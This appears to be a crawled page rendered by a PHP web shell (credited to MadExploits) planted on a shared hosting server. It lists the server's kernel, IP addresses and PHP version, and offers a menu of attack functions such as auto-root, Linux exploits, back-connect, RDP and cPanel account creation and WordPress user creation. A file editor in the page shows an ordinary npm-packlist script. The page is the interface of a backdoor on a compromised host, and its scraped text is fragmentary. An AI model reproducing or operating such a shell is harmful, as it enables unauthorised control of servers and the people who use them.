Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.224.43.50
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
npm-packlist /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
#!/opt/alt/alt-nodejs16/root/usr/bin/node 'use strict' const packlist = require('../') const dirs = [] let doSort = false process.argv.slice(2).forEach(arg => { if (arg === '-h' || arg === '--help') { console.log('usage: npm-packlist [-s --sort] [directory, directory, ...]') process.exit(0) } else if (arg === '-s' || arg === '--sort') { doSort = true } else { dirs.push(arg) } }) const sort = list => doSort ? list.sort((a, b) => a.localeCompare(b, 'en')) : list const main = async () => { if (!dirs.length) { const results = await packlist({ path: process.cwd() }) console.log(sort(results).join('\n')) } else { for (const dir of dirs) { console.group(`> ${dir}`) const results = await packlist({ path: dir }) console.log(sort(results).join('\n')) console.groupEnd() } } } // coverage disabled for catch handler because we don't need to test that main().catch(/* istanbul ignore next */(err) => { process.exitCode = 1 console.error(err.stack) })
Close